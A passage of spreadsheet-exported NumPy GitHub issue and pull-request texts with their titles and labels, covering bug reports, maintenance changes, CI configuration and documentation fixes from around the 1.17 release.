Current behavior:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; np.dot(None, None)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/Users/shoyer/dev/numpy/numpy/core/overrides.py", line 175, in public_api_x000D_
    implementation, public_api, relevant_args, args, kwargs)_x000D_
TypeError: unsupported operand type(s) for *: 'NoneType' and 'NoneType'_x000D_
_x000D_
&gt;&gt;&gt; np.stack([], invalid=True)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/Users/shoyer/dev/numpy/numpy/core/overrides.py", line 148, in public_api_x000D_
    relevant_args = dispatcher(*args, **kwargs)_x000D_
TypeError: _stack_dispatcher() got an unexpected keyword argument 'invalid'_x000D_
```_x000D_
_x000D_
With this change:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; np.dot(None, None)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "&lt;__array_function__ internals&gt;", line 6, in dot_x000D_
TypeError: unsupported operand type(s) for *: 'NoneType' and 'NoneType'_x000D_
_x000D_
&gt;&gt;&gt; np.stack([], invalid=True)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "&lt;__array_function__ internals&gt;", line 4, in stack_x000D_
TypeError: _stack_dispatcher() got an unexpected keyword argument 'invalid'_x000D_
```_x000D_
_x000D_
This fixes an issue pointed out by @mattip</t>
  </si>
  <si>
    <t>MAINT: Use exec() instead array_function_dispatch to improve tracebacks</t>
  </si>
  <si>
    <t>Looking at Matti's modifications in #13482, I don't see a good reason to keep `test-installed-numpy.py` if we are going to continue using `runtests.py`. Both have separate parsers to accomplish similar things, but `runtests.py` is more developed / actively used while `test-installed-numpy.py` still has discussion of nose / python 2.4, and Matti's proposed change there adds `-n` option which does something different in `runtests.py`._x000D_
_x000D_
`runtests.py -n` will test installed NumPy instead of rebuilding, so seems like redundancy / maintenance burden we don't need moving forward</t>
  </si>
  <si>
    <t>MAINT: remove numpy/tools/test-installed-numpy.py ?</t>
  </si>
  <si>
    <t xml:space="preserve">```python_x000D_
dt2 = dtype({'names':['a','b'], 'formats':['i1','&lt;i4'], 'offsets':[0,4], 'itemsize':8}, align=True)_x000D_
arr = np.empty((), dt2)_x000D_
assert arr.dtype.isalignedstruct_x000D_
assert arr[['a']].dtype.isalignedstruct_x000D_
```_x000D_
_x000D_
cc @ahaldane </t>
  </si>
  <si>
    <t>isalignedstruct is not preserved on structured array views</t>
  </si>
  <si>
    <t>I had an issue installing numpy from an enthought package called enable on MacOS high sierra and python 3.5 and python 3.6.  It seems that subprocess is not imported where needed in the system_info.py file.</t>
  </si>
  <si>
    <t>BUG: distutils/system_info.py fix missing subprocess import</t>
  </si>
  <si>
    <t>BUG: exp, log AVX loops do not use steps</t>
  </si>
  <si>
    <t xml:space="preserve">I'm testing equality between large arrays (several GB)._x000D_
_x000D_
The cast to a list in test function really blows up the computation due to the fact that we are casting every entry in a boolean array into a python object._x000D_
_x000D_
The following achieves the same thing, without the python list cast._x000D_
_x000D_
FYI: I tried to use `count_nonzero` but that gave the error in the detail below_x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
```_x000D_
_______________________ TestEqual.test_subclass_that_does_not_implement_npall ________________________x000D_
_x000D_
self = &lt;numpy.testing.tests.test_utils.TestEqual object at 0x7fed7fc8c128&gt;_x000D_
_x000D_
    def test_subclass_that_does_not_implement_npall(self):_x000D_
        class MyArray(np.ndarray):_x000D_
            def __array_function__(self, *args, **kwargs):_x000D_
                return NotImplemented_x000D_
    _x000D_
        a = np.array([1., 2.]).view(MyArray)_x000D_
        b = np.array([2., 3.]).view(MyArray)_x000D_
        with assert_raises(TypeError):_x000D_
            np.all(a)_x000D_
        self._test_equal(a, a)_x000D_
&gt;       self._test_not_equal(a, b)_x000D_
_x000D_
MyArray    = &lt;class 'numpy.testing.tests.test_utils.TestArrayEqual.test_subclass_that_does_not_implement_npall.&lt;locals&gt;.MyArray'&gt;_x000D_
a          = MyArray([1., 2.])_x000D_
b          = MyArray([2., 3.])_x000D_
self       = &lt;numpy.testing.tests.test_utils.TestEqual object at 0x7fed7fc8c128&gt;_x000D_
_x000D_
numpy/testing/tests/test_utils.py:192: _x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __x000D_
numpy/testing/tests/test_utils.py:29: in _test_not_equal_x000D_
    self._assert_func(a, b)_x000D_
numpy/testing/_private/utils.py:351: in assert_equal_x000D_
    return assert_array_equal(actual, desired, err_msg, verbose)_x000D_
numpy/testing/_private/utils.py:901: in assert_array_equal_x000D_
    verbose=verbose, header='Arrays are not equal')_x000D_
numpy/testing/_private/utils.py:803: in assert_array_compare_x000D_
    mismatch = 100.0 * count_nonzero(reduced) / ox.size_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __x000D_
_x000D_
    @functools.wraps(implementation)_x000D_
    def public_api(*args, **kwargs):_x000D_
        relevant_args = dispatcher(*args, **kwargs)_x000D_
        return implement_array_function(_x000D_
&gt;           implementation, public_api, relevant_args, args, kwargs)_x000D_
E       TypeError: no implementation found for 'numpy.count_nonzero' on types that implement __array_function__: [&lt;class 'numpy.testing.tests.test_utils.TestArrayEqual.test_subclass_that_does_not_implement_npall.&lt;locals&gt;.MyArray'&gt;]_x000D_
_x000D_
_x000D_
numpy/core/overrides.py:150: TypeError_x000D_
============================= 2 failed, 8311 deselected in 3.77 seconds =============================_x000D_
```_x000D_
&lt;/details&gt;_x000D_
_x000D_
&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/development_workflow.html_x000D_
--&gt;_x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>MAINT: implement assert_array_compare without converting array to python list</t>
  </si>
  <si>
    <t>Fixes #13512 by considering steps in the inner loop_x000D_
_x000D_
Still a WIP - added a test for all ufuncs</t>
  </si>
  <si>
    <t>WIP, BUG: exp, log AVX loops do not use steps</t>
  </si>
  <si>
    <t xml:space="preserve">It seems to me that the AVX routines of `np.exp` and `np.log` disregard the `strides` attribute of inputs._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
print(np.exp(np.arange(4, dtype=np.float64)[::2]))  # correct_x000D_
print(np.exp(np.arange(4, dtype=np.float32)[::2]))  # wrong_x000D_
print(np.exp(np.arange(4, dtype=np.float16)[::2]))  # correct_x000D_
```_x000D_
_x000D_
output:_x000D_
```_x000D_
[1.        7.3890561]_x000D_
[1.       2.718282]_x000D_
[1.   7.39]_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
```_x000D_
1.17.0.dev0+634d66d 3.7.1 (default, Nov  6 2018, 21:02:07)_x000D_
[Clang 10.0.0 (clang-1000.10.44.4)]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>BUG: exp and log with non-contiguous float32 inputs</t>
  </si>
  <si>
    <t>Mailmap needs updating for the 1.17 release. Could the following folks reply here with an official name and email address?_x000D_
_x000D_
- [x] @adeak_x000D_
- [ ] @euronion_x000D_
- [x] @kikocorreoso_x000D_
- [x] @psschand_x000D_
- [x] @spacescientist_x000D_
- [x] @vrindaaa_x000D_
_x000D_
TIA, Chuck (the release manager)</t>
  </si>
  <si>
    <t>Update mailmap for 1.17.</t>
  </si>
  <si>
    <t xml:space="preserve">This commit changes PyMemoryView_FromObject call sites to only_x000D_
clear BufferError and TypeError. Any other error will be raised_x000D_
to the caller of np.array._x000D_
_x000D_
---_x000D_
_x000D_
I'd be happy to add a test for this, but it requires writing an extension class _x000D_
with a custom buffer interface implementation. Should I do that?_x000D_
</t>
  </si>
  <si>
    <t>This adds a `sparse` keyword-option to `np.core.numeric.indices`. This is inspired by the same option in the `np.meshgrid` function._x000D_
_x000D_
The same functionality can in principle already be achieved by using the `np.ogrid` index tricks like this:_x000D_
```_x000D_
def indices_sparse(dimensions):_x000D_
    return np.ogrid[tuple(slice(0, l) for l in dimensions)]_x000D_
```_x000D_
However, the implementation of `ogrid` is much more complicated than the simple change to `np.core.numeric.indices` in this PR.</t>
  </si>
  <si>
    <t>ENH: Add sparse option to np.core.numeric.indices</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</si>
  <si>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Fix #13502 by updating broken links in PULL_REQUEST_TEMPLATE.md_x000D_
</t>
  </si>
  <si>
    <t>DOC: Update links in PULL_REQUEST_TEMPLATE.md</t>
  </si>
  <si>
    <t>This attempts to support object arrays in matmul (aka `@`), see issue #11332_x000D_
_x000D_
Things to check:_x000D_
 - I am not sure that Python reference counting is done correctly._x000D_
 - For the edge case `a = np.array([], dtype="object")` the code `a @ a` returns `None`._x000D_
This is consistent with `np.dot(a, a)` (also `None`) but not necessarily with the_x000D_
result of `b @ b` with `b = np.array([])` which is `0.0`._x000D_
 - There is no change to the documentation nor tests._x000D_
_x000D_
However, here is a minimal test:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
from numpy.testing import assert_array_equal_x000D_
_x000D_
class MockNumber(): _x000D_
    def __init__(self, value): _x000D_
        self.value = value _x000D_
    def __add__(self, other): _x000D_
        return MockNumber(self.value + other.value)_x000D_
    def __sub__(self, other): _x000D_
        return MockNumber(self.value - other.value)_x000D_
    def __mul__(self, other): _x000D_
        return MockNumber(self.value * other.value)_x000D_
    def __eq__(self, other):_x000D_
        return self.value == other.value_x000D_
    def __str__(self):_x000D_
        return f"MockNumber({str(self.value)})"_x000D_
    def __repr__(self): _x000D_
        return f"MockNumber({str(self.value)})"_x000D_
_x000D_
_x000D_
M1 = np.random.randint(0, 1000, (4, 3, 3))_x000D_
M2 = np.random.randint(0, 1000, (4, 3, 3))_x000D_
_x000D_
M3 = np.matmul(M1, M2)_x000D_
_x000D_
to_MockNumber = np.vectorize(MockNumber)_x000D_
_x000D_
N1 = to_MockNumber(M1)_x000D_
N2 = to_MockNumber(M2)_x000D_
N3_ref = to_MockNumber(M3)_x000D_
_x000D_
N3 = np.matmul(N1, N2)_x000D_
_x000D_
assert_array_equal(N3, N3_ref)_x000D_
```_x000D_
_x000D_
and an example_x000D_
_x000D_
```python_x000D_
a = np.array([[MockNumber(1),MockNumber(2)],[MockNumber(3),MockNumber(4)]], dtype="object") _x000D_
b = a @ a_x000D_
print(b)_x000D_
```</t>
  </si>
  <si>
    <t>ENH: Support object arrays in matmul</t>
  </si>
  <si>
    <t>['01 - Enhancement', '56 - Needs Release Note.', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">When trying to import numpy in pypy3 an error message is issued_x000D_
_x000D_
### Reproducing code example:_x000D_
``_x000D_
cd  ~_x000D_
virtualenv -p pypy3 pypy3-env_x000D_
source pypy3-env/bin/activate_x000D_
cd pypy3-env/bin_x000D_
pip3 install numpy  _x000D_
`pypy3_x000D_
import numpy _x000D_
```_x000D_
_x000D_
### Error message:_x000D_
Traceback (most recent call last):_x000D_
  File "/home/user/pypy3-env/site-packages/numpy/core/__init__.py", line 40, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "/home/user/pypy3-env/site-packages/numpy/core/multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "/home/user/pypy3-env/site-packages/numpy/core/overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: /snap/core/current/lib/x86_64-linux-gnu/libm.so.6: version `GLIBC_2.27' not found (required by /home/user/pypy3-env/site-packages/numpy/core/_multiarray_umath.pypy3-510-x86_64-linux-gnu.so)_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/home/user/pypy3-env/site-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "/home/user/pypy3-env/site-packages/numpy/core/__init__.py", line 71, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_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/home/user/pypy3-env/bin/pypy3),_x000D_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/snap/core/current/lib/x86_64-linux-gnu/libm.so.6: version `GLIBC_2.27' not found (required by /home/user/pypy3-env/site-packages/numpy/core/_multiarray_umath.pypy3-510-x86_64-linux-gnu.so)_x000D_
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&gt;&gt;&gt;&gt; print( sys.version)_x000D_
3.5.3 (3f6eaa010fce, Jan 11 2018, 04:44:35)_x000D_
[PyPy 5.10.1 with GCC 6.2.0 20160901]_x000D_
_x000D_
(pypy3-env) user@shlomo2-pcl:~/pypy3-env/bin$ pip3 list_x000D_
Package       Version_x000D_
------------- -------_x000D_
cffi          1.11.2_x000D_
greenlet      0.4.12_x000D_
numpy         1.16.3_x000D_
pip           19.1.1_x000D_
pkg-resources 0.0.0_x000D_
readline      6.2.4.1_x000D_
setuptools    41.0.1_x000D_
wheel         0.33.1_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>numpy fail to import under pypy3</t>
  </si>
  <si>
    <t>['24 - PyPy']</t>
  </si>
  <si>
    <t>&lt;!--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Closes #9612 by using `with` context manager to open/close files where applicable, also hopefully fixes LGTM alerts :smile: _x000D_
_x000D_
Since the diff is huge, could definitely involve some linting issues, or some extraneous `close()` statements could still be present. Kudos to the people who review this, and your patience is much appreciated!</t>
  </si>
  <si>
    <t>MAINT: Use with statement to open/close files to fix LGTM alerts</t>
  </si>
  <si>
    <t>Closes #13497._x000D_
_x000D_
Caveat: This may not be the clearest for the degenerate case of all zero singular values (i.e., the 0 matrix will stay that way)._x000D_
_x000D_
(Unrelated FYI: The links in the PR template currently give a 404. I found a working version of the link here: https://docs.scipy.org/doc/numpy/dev/gitwash/development_workflow.html#writing-the-commit-message)</t>
  </si>
  <si>
    <t>DOC: Clarify rcond normalization in linalg.pinv</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>Fixes scipy/scipy#4776_x000D_
_x000D_
Masked arrays ignore fortran ordering, breaking `scipy.io.savemat`.</t>
  </si>
  <si>
    <t>BUG: ma.tostring should respect the order parameter</t>
  </si>
  <si>
    <t>Fixes #13493 by registering a non-simd loop for 'e' (half) before the 'f' (float) one._x000D_
_x000D_
Also added a test that all ufuncs respect the types they declare</t>
  </si>
  <si>
    <t>BUG: test all ufunc.types for return type, fix for exp, log</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
After #13134 is merged, `np.exp` and `np.log` return float32 arrays for float16 inputs.  Is the change intended?  I could not find docs for it (https://www.numpy.org/devdocs/reference/generated/numpy.exp.html), while it is documented that `np.sum` casts ints to the default platform integer._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
print(np.exp(np.array([1, 2], np.float16)).dtype)  # =&gt; float32_x000D_
print(np.log(np.array([1, 2], np.float16)).dtype)  # =&gt; float32_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
&lt;!-- ### Error message: --&gt;_x000D_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1.17.0.dev0+64b3e67 3.7.1 (default, Nov  6 2018, 21:02:07)_x000D_
[Clang 10.0.0 (clang-1000.10.44.4)]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>BUG: exp and log cast float16 to float32</t>
  </si>
  <si>
    <t>This version encodes the dtype as utf8 instead of latin1._x000D_
_x000D_
Unfortunately we need to create a new version to make this change, because we did not limit ourselves to ASCII in versions 1 and 2._x000D_
_x000D_
Fixes gh-7391_x000D_
_x000D_
---_x000D_
_x000D_
Two commits - a refactor to make adding new formats easy, and then the new format. Can split if it's helpful</t>
  </si>
  <si>
    <t xml:space="preserve"> BUG/ENH: Create npy format 3.0 to support extended unicode characters in dtypes</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', '03 - Maintenance', 'component: numpy.lib']</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</si>
  <si>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</si>
  <si>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Closes gh-13475</t>
  </si>
  <si>
    <t>DOC: add security vulnerability reporting and doc links to README</t>
  </si>
  <si>
    <t xml:space="preserve">Add duration report. On my machine there are a two tests that each take more than 5 seconds to run (out of a total of 70 secs), see if it repeats on the travis CI runs. _x000D_
</t>
  </si>
  <si>
    <t>TEST: add duration report to tests, speed up two outliers</t>
  </si>
  <si>
    <t>DOC: Mention the handling of nan in the assert_equal docstring.</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.testing']</t>
  </si>
  <si>
    <t xml:space="preserve">The parameter `bins` only accepts lowercase strings, but the [notes](https://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram_bin_edges.html#numpy.histogram_bin_edges) are capitalized. This makes it easier to copy and paste 😄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</si>
  <si>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have notes in histogram_bin_edges match parameter style</t>
  </si>
  <si>
    <t xml:space="preserve">tl;dr we need a way to report security vulnerabilities to us, and to document that._x000D_
_x000D_
For context, see https://tidelift.com/docs/lifting/security. Since we have never had an actually urgent CVE ever (as far as I know), I'd prefer to just link to https://tidelift.com/docs/lifting/security-process. Any objections?_x000D_
</t>
  </si>
  <si>
    <t>document a security vulnerability reporting mechanism</t>
  </si>
  <si>
    <t xml:space="preserve">The `numpy.histogram` and `numpy.histogram_bin_edges` bins flag will now allow for mixed-case strings, so `bins='FD'` or `bins='Scott'` will work as is used in the [doc notes](https://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram_bin_edges.html#numpy.histogram_bin_edges), which describes the options as `Auto`,`FD`, etc.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</si>
  <si>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allow for mixed-case histogram bin methods</t>
  </si>
  <si>
    <t>Reason: the GitHub license detection method relies on the LICENSE_x000D_
file matching for at least 95% with a standard license._x000D_
Adding even one more sentence changes the license displayed in the_x000D_
GitHub UI and also in the GitHub API that can be queried from_x000D_
BSD to "other"._x000D_
_x000D_
See https://github.com/numpy/numpy/issues/13447 for more details._x000D_
_x000D_
Note that this split license is what GitHub recommends to do,_x000D_
and is also what we do for wheels, where we append to the license_x000D_
file at build time.</t>
  </si>
  <si>
    <t>LICENSE: split license file in standard BSD 3-clause and bundled.</t>
  </si>
  <si>
    <t>Addresses #13461 _x000D_
Changed the "new in version" from 2.0.0 to 1.6.0 for half-precision functions</t>
  </si>
  <si>
    <t>DOC: correct "version added" in npymath docs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
Hi,_x000D_
_x000D_
I've discovered that `numpy` array printing is slightly different for different platforms (might be related to platform-dependent types somehow - https://www.ibm.com/support/knowledgecenter/en/SSFKSJ_9.0.0/com.ibm.mq.ref.dev.doc/q104610_.htm)._x000D_
This inconsistency makes the testing of docstring examples challenging (https://github.com/scikit-image/scikit-image/pull/3873) across the operating systems._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
Notice the `dtype` part:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
### Windows 32bit_x000D_
_x000D_
np.set_printoptions(legacy='1.13')_x000D_
np.argmin([[0,2,-1,3], [1,2,3,4]], axis=1)_x000D_
# array([2, 0], dtype=int32)_x000D_
_x000D_
np.set_printoptions(legacy=False)_x000D_
np.argmin([[0,2,-1,3], [1,2,3,4]], axis=1)_x000D_
# array([2, 0], dtype=int32)_x000D_
_x000D_
### Windows 64bit_x000D_
_x000D_
np.set_printoptions(legacy='1.13')_x000D_
np.argmin([[0,2,-1,3], [1,2,3,4]], axis=1)_x000D_
# array([2, 0], dtype=int64)_x000D_
_x000D_
np.set_printoptions(legacy=False)_x000D_
np.argmin([[0,2,-1,3], [1,2,3,4]], axis=1)_x000D_
# array([2, 0], dtype=int32)_x000D_
_x000D_
### Linux / MacOS 64bit_x000D_
_x000D_
np.set_printoptions(legacy='1.13')_x000D_
np.argmin([[0,2,-1,3], [1,2,3,4]], axis=1)_x000D_
# array([2, 0])_x000D_
_x000D_
np.set_printoptions(legacy=False)_x000D_
np.argmin([[0,2,-1,3], [1,2,3,4]], axis=1)_x000D_
# array([2, 0])_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
(for Windows VM)_x000D_
1.16.3, wide range of Python 3 versions_x000D_
_x000D_
(for MacOS PC)_x000D_
1.16.2 3.6.8 |Anaconda, Inc.| (default, Dec 29 2018, 19:04:46)_x000D_
[GCC 4.2.1 Compatible Clang 4.0.1 (tags/RELEASE_401/final)]_x000D_
</t>
  </si>
  <si>
    <t>ndarray printing is inconsistent across the platforms</t>
  </si>
  <si>
    <t>['57 - Close?', 'component: Documentation']</t>
  </si>
  <si>
    <t xml:space="preserve">Enhancing the error message produced when trying to create an `ndarray` that is bigger than the defined `MAXDIMS` (i.e., 32 at the moment of writing this) by including also the given dimension._x000D_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</si>
  <si>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err msg for too large sequences. See  #13450</t>
  </si>
  <si>
    <t>CI-based Intel SDE (SkylakeX emulation) reproducer for #13401._x000D_
_x000D_
Many thanks to @isuruf and @martin-frbg for help upstream. For gory details: https://github.com/xianyi/OpenBLAS/issues/2108_x000D_
_x000D_
This only works for Mac because our MacPython (ecosystem) Linux OpenBLAS was built via `maylinux1` containers where the gcc version is not high enough to empower the AVX switch that triggers the problem in OpenBLAS. So, from the standpoint of our recently-released wheels, Linux should be ok for this matter, consistent with pip install reports in the original issue only failing on Mac. _x000D_
_x000D_
`conda` is another story--there you can induce the failure on Linux by using recent OpenBLAS built outside manylinux1 constraints as @isuruf observed today._x000D_
_x000D_
This is really just the beginning of something that is going somewhere (?) and perhaps not in NumPy repo proper. When BLIS does this they go through a for loop of emulation archs: https://github.com/flame/blis/blob/master/travis/do_sde.sh_x000D_
_x000D_
Perhaps the short-term objective here is simply a public CI run that fails because of the reported OpenBLAS issue, and provides a platform for us to try the latest OpenBLAS binary (build in our MacPython ecosystem) to see if it helps for that specific issue._x000D_
_x000D_
Plans beyond that are perhaps contentious, as discussed in #13401, but maybe seeing this will help drive that discussion in one direction or another. One problem upstream is that there may not be a maintainer with sufficient OpenBLAS repo access rights to set up new CI for Azure, etc. But they are open to the idea, it seems.</t>
  </si>
  <si>
    <t>TST: Reproducer for SkylakeX Issue gh-13401</t>
  </si>
  <si>
    <t>This also deprecates setting a non-writeable array to writeable if_x000D_
that array does not own its data (and has no base object to check if_x000D_
the memory may be writeable). (Deprecation on Python side only)_x000D_
_x000D_
Closes gh-481_x000D_
_x000D_
_x000D_
---_x000D_
_x000D_
Well, this was probably a waste of time, thought it would be quicker, but should be reasonable in any case...</t>
  </si>
  <si>
    <t>BUG,DEP: Fix writeable flag setting for arrays without base</t>
  </si>
  <si>
    <t xml:space="preserve">https://docs.scipy.org/doc/numpy/reference/c-api.coremath.html#half-precision-functions says that half-precision functions were added to npymath in version 2.0.0, but that's clearly not true :)_x000D_
From https://github.com/numpy/numpy/commit/9b72aa96cec9d182062f378fca869aaa303f1ca9 it looks like this should be 1.6.0._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
numpy 1.16 docs._x000D_
</t>
  </si>
  <si>
    <t>Incorrect "new in version" info in npymath docs.</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
I just  wanna know if there are some ways to know all the deprecated apis in latest numpy</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to get a collection of deprecated python apis in latest numpy . </t>
  </si>
  <si>
    <t>There has been the request (in the form of PR gh-6727) to add the linear operators `divergence`, `curl`, and `laplace` to `np.linalg`._x000D_
_x000D_
While it probably needs some discussion, the request seems reasonable. However, the PR stalled years ago and still needed quite a lot of work. But, the PR (gh-6727) may in any case provide a basis to pick this up again, and contain valuable discussion.</t>
  </si>
  <si>
    <t>ENH: add divergence, curl, and laplacian to `np.linalg`</t>
  </si>
  <si>
    <t>['57 - Close?', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>Fixes #13452_x000D_
_x000D_
~I've set this as a draft PR since there's an intentional bug to demonstrate the CI mechanics discussed.~_x000D_
_x000D_
Reviewers should feel free to test other failure scenarios, or even better on their own forks._x000D_
_x000D_
Pertinent docs:_x000D_
- [specifying conditions](https://docs.microsoft.com/en-us/azure/devops/pipelines/process/conditions?view=azure-devops&amp;tabs=yaml)_x000D_
- [task control options](https://docs.microsoft.com/en-us/azure/devops/pipelines/process/tasks?view=azure-devops&amp;tabs=yaml#task-control-options)_x000D_
- [publish test results task](https://docs.microsoft.com/en-us/azure/devops/pipelines/tasks/test/publish-test-results?view=azure-devops&amp;tabs=yaml)</t>
  </si>
  <si>
    <t>TST: refine Azure fail reports</t>
  </si>
  <si>
    <t xml:space="preserve">https://github.com/numpy/numpy/blob/4b6b29afc06a639975d08f2e95dc3e1c36486188/numpy/core/src/multiarray/iterators.c#L1391 shouldn't be directly comparing to NULL; it should be checking that the kwargs dictionary is len 0 or something like that._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: np.broadcast(1, **{}) raises ValueError: keyword arguments not accepted.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I make regular use of the very efficient (nan)argmin and (nan)argmax numpy functions._x000D_
I feel having them return an array of bool indices instead of a dimension-reduced array of int indices would be valuable._x000D_
_x000D_
Indeed, let's consider a collection of 2D arrays, varying with time along axis 0 and a spatial coordinate (radius) along axis 1:_x000D_
**data1, data2, data3...**_x000D_
_x000D_
The spacial coordinate (radius) is itself a 2D array of the same size, because it changes at every time:_x000D_
**radius**_x000D_
_x000D_
If I want to get, for each array, its value at the lowest / highest spacial coordinate for each time I have to:_x000D_
* use argmin / argmax to get the index array **ind** of the min/max coordinate at each time_x000D_
* use that info to extract the corresponding value from each array_x000D_
_x000D_
But if the array of indices is returned as int, I have to loop over time for each array (using list comprehension):_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
value_of_data1_at_min_radius = np.array([ data1[i, ind[i]] for i in ind ])_x000D_
```_x000D_
_x000D_
That implies looping, on a lot of time steps._x000D_
This does not feel very right since the key info (**ind**) is computed once and efficiently_x000D_
_x000D_
If there was an option to return ind as a bool array looping on time would be avoided as applying it directly to each array would be sufficient._x000D_
_x000D_
What do you think ?_x000D_
Thanks</t>
  </si>
  <si>
    <t>(nan)argmax and (nan)argmin should optionally return a bool array</t>
  </si>
  <si>
    <t>Follow-up to gh-13448. Summary of the issue by @tylerjereddy there:_x000D_
_x000D_
"""_x000D_
We only hard fail Azure CI entries when there are test failures, which means that test results have to be produced to record the failure in the next step of test publication._x000D_
_x000D_
But build failures are ignored when build + test are smushed into one Azure stage._x000D_
_x000D_
This is the tradeoff we implicitly accepted by allowing test results to be published even when the build / test stage fails._x000D_
_x000D_
I see PyPy3 was failing in that PR before merge too, for a different reason as well. I believe the longer-term solution is to separate the build and test stages to separate steps, and enforce a hard fail on build errors, but catch test failures only in the publication stage._x000D_
_x000D_
For the 32-bit job this is a little tricky because a docker container is used to do both build &amp; test, but there should be a neat way around that with some thought / mounting of the build results._x000D_
_x000D_
Matti can perhaps comment on the PyPy3 job, but it should almost certainly be expanded in this way &amp; same for all other azure jobs with fused build + test stages (also kind of makes runtests.py a little less useful)._x000D_
"""_x000D_
_x000D_
The Azure config issue isn't solved. I agree with Matti's comments on that issue, we should make Azure behave like all other CI. Build failures, segfaults, etc. should all result in a little red cross so the reviewer actually goes and has a look.</t>
  </si>
  <si>
    <t>Azure config silently passes build issues and crashes</t>
  </si>
  <si>
    <t xml:space="preserve">When reading the docu on numpy.random.uniform(low=0.0, high=1.0, size=None)_x000D_
it says low and high are optional. _x000D_
Therefore, I would assume, wenn I just pass one float &lt;high&gt; as an argument, the function would return samples drawn from a uniform distribution \in [0.0,  &lt;high_val&gt;)._x000D_
_x000D_
But it seems that the default value for &lt;low&gt; is 1.0 instead of 0.0_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
np.random.uniform(1.0)_x000D_
```_x000D_
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1.15.1 3.7.0 (default, Jun 28 2018, 08:04:48) [MSC v.1912 64 bit (AMD64)]   _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">numpy.random.uniform default value low </t>
  </si>
  <si>
    <t>I'm trying to create an `ndarray` of a shape `np.repeat(2, K)` where `K` varies from `2` to `2048`._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
